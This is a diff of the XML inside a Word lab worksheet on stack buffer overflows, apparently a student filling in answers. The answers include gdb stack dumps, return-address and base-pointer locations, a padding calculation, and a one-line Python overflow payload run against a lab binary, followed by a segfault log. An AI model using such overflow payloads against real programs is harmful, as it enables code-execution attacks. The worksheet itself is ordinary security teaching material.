--- a/lab07/attack.docx
+++ b/lab07/attack.docx
@@ -1914,7 +1914,234 @@
               </w:rPr>
             </w:pPr>
             <w:r>
-              <w:rPr/>
+              <w:rPr>
+                <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
+                <w:color w:val="C00000"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>0xffffca4c:</w:t>
+              <w:tab/>
+              <w:t>0x42424141</w:t>
+              <w:tab/>
+              <w:t>0x44444343</w:t>
+              <w:tab/>
+              <w:t>0x00464545</w:t>
+              <w:tab/>
+              <w:t>0xffffca64</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl/>
+              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:color w:val="C00000"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
+                <w:color w:val="C00000"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>0xffffca5c:</w:t>
+              <w:tab/>
+              <w:t>0x565561d3</w:t>
+              <w:tab/>
+              <w:t>0x00000012</w:t>
+              <w:tab/>
+              <w:t>0xffffca78</w:t>
+              <w:tab/>
+              <w:t>0x565561f7</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl/>
+              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:color w:val="C00000"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
+                <w:color w:val="C00000"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>0xffffca6c:</w:t>
+              <w:tab/>
+              <w:t>0x0000000f</w:t>
+              <w:tab/>
+              <w:t>0x0000000f</w:t>
+              <w:tab/>
+              <w:t>0xf7f94e34</w:t>
+              <w:tab/>
+              <w:t>0x00000000</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl/>
+              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:color w:val="C00000"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
+                <w:color w:val="C00000"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>0xffffca7c:</w:t>
+              <w:tab/>
+              <w:t>0xf7d90c75</w:t>
+              <w:tab/>
+              <w:t>0x00000001</w:t>
+              <w:tab/>
+              <w:t>0xffffcb34</w:t>
+              <w:tab/>
+              <w:t>0xffffcb3c</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl/>
+              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:color w:val="C00000"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
+                <w:color w:val="C00000"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>0xffffca8c:</w:t>
+              <w:tab/>
+              <w:t>0xffffcaa0</w:t>
+              <w:tab/>
+              <w:t>0xf7f94e34</w:t>
+              <w:tab/>
+              <w:t>0x565561d6</w:t>
+              <w:tab/>
+              <w:t>0x00000001</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl/>
+              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:color w:val="C00000"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
+                <w:color w:val="C00000"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>0xffffca9c:</w:t>
+              <w:tab/>
+              <w:t>0xffffcb34</w:t>
+              <w:tab/>
+              <w:t>0xf7f94e34</w:t>
+              <w:tab/>
+              <w:t>0xffffcb3c</w:t>
+              <w:tab/>
+              <w:t>0xf7ffcb60</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl/>
+              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:color w:val="C00000"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
+                <w:color w:val="C00000"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>0xffffcaac:</w:t>
+              <w:tab/>
+              <w:t>0x00000000</w:t>
+              <w:tab/>
+              <w:t>0xf81ea2ec</w:t>
+              <w:tab/>
+              <w:t>0xb593c8fc</w:t>
+              <w:tab/>
+              <w:t>0x00000000</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl/>
+              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:color w:val="C00000"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
+                <w:color w:val="C00000"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>0xffffcabc:</w:t>
+              <w:tab/>
+              <w:t>0x00000000</w:t>
+              <w:tab/>
+              <w:t>0x00000000</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -2089,6 +2316,35 @@
         <w:t>At what ADDRESS does the character array s start?</w:t>
         <w:br/>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>0xFFFFCA4C</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:suppressAutoHyphens w:val="false"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:ind w:hanging="0" w:left="1080"/>
+        <w:contextualSpacing/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2112,23 +2368,43 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">What is the VALUE at that address? </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>(Note that it’s a CHARACTER array!)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
+        <w:t>What is the VALUE at that address? (Note that it’s a CHARACTER array!)</w:t>
         <w:br/>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="C00000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>0x42424141</w:t>
+        <w:tab/>
+        <w:t>0x44444343</w:t>
+        <w:tab/>
+        <w:t>0x00464545</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:suppressAutoHyphens w:val="false"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:ind w:hanging="0" w:left="1080"/>
+        <w:contextualSpacing/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
       </w:r>
     </w:p>
     <w:p>
@@ -2156,6 +2432,51 @@
         <w:t>At what ADDRESS on the stack is the return address that bar() will use to return to foo()?</w:t>
         <w:br/>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>0xFFFFCA</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>5</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>C</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:suppressAutoHyphens w:val="false"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:ind w:hanging="0" w:left="1080"/>
+        <w:contextualSpacing/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2182,6 +2503,36 @@
         <w:t>What is the VALUE of that return address?</w:t>
         <w:br/>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="C00000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>0x565561d3</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:suppressAutoHyphens w:val="false"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:ind w:hanging="0" w:left="1080"/>
+        <w:contextualSpacing/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2224,6 +2575,35 @@
         <w:t>?</w:t>
         <w:br/>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>0xFFFFCA6C</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:suppressAutoHyphens w:val="false"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:ind w:hanging="0" w:left="1080"/>
+        <w:contextualSpacing/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2265,6 +2645,37 @@
         </w:rPr>
         <w:t>, as printed by the “x/30wx” command used above?</w:t>
         <w:br/>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="C00000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>0x0000000f</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:suppressAutoHyphens w:val="false"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:ind w:hanging="0" w:left="1080"/>
+        <w:contextualSpacing/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
       </w:r>
     </w:p>
     <w:p>
@@ -2292,6 +2703,36 @@
         <w:t>At what ADDRESS on the stack is the “base pointer” that is stored at the start of executing foo()?</w:t>
         <w:br/>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="C00000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>0xffffca5c</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:suppressAutoHyphens w:val="false"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:ind w:hanging="0" w:left="1080"/>
+        <w:contextualSpacing/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2320,9 +2761,35 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
         <w:suppressAutoHyphens w:val="false"/>
         <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+        <w:ind w:hanging="0" w:left="1080"/>
+        <w:contextualSpacing/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>0xffffca78</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:suppressAutoHyphens w:val="false"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
         <w:ind w:left="720"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
@@ -2332,7 +2799,12 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:color w:val="C9211E"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
       </w:r>
     </w:p>
     <w:p>
@@ -2375,30 +2847,6 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:suppressAutoHyphens w:val="false"/>
-        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
-        <w:contextualSpacing/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
       </w:r>
       <w:r>
         <w:br w:type="page"/>
@@ -2929,7 +3377,12 @@
               </w:rPr>
             </w:pPr>
             <w:r>
-              <w:rPr/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:color w:val="C9211E"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
             </w:r>
           </w:p>
           <w:p>
@@ -2952,6 +3405,16 @@
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
+              <w:t xml:space="preserve">40 bytes to fill buffer q. Another 4 bytes to overwrite the base pointer. </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:color w:val="C00000"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>Another 4 bytes to overwrite the instruction pointer. In total 48 bytes are needed.</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -3304,7 +3767,11 @@
               </w:rPr>
             </w:pPr>
             <w:r>
-              <w:rPr/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:color w:val="C9211E"/>
+              </w:rPr>
+              <w:t>./pwned $(python3 -c "import sys; sys.stdout.buffer.write(b'A'*48 + b'\x08\x04\xc2\x84\xc2\x82');")</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -3325,6 +3792,27 @@
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl/>
+              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>[20802.932796] pwned[97521]: segfault at 84c20408 ip 0000000084c20408 sp 00000000ffeba120 error 14 likely on CPU 23 (core 39, socket 0)</w:t>
             </w:r>
           </w:p>
         </w:tc>
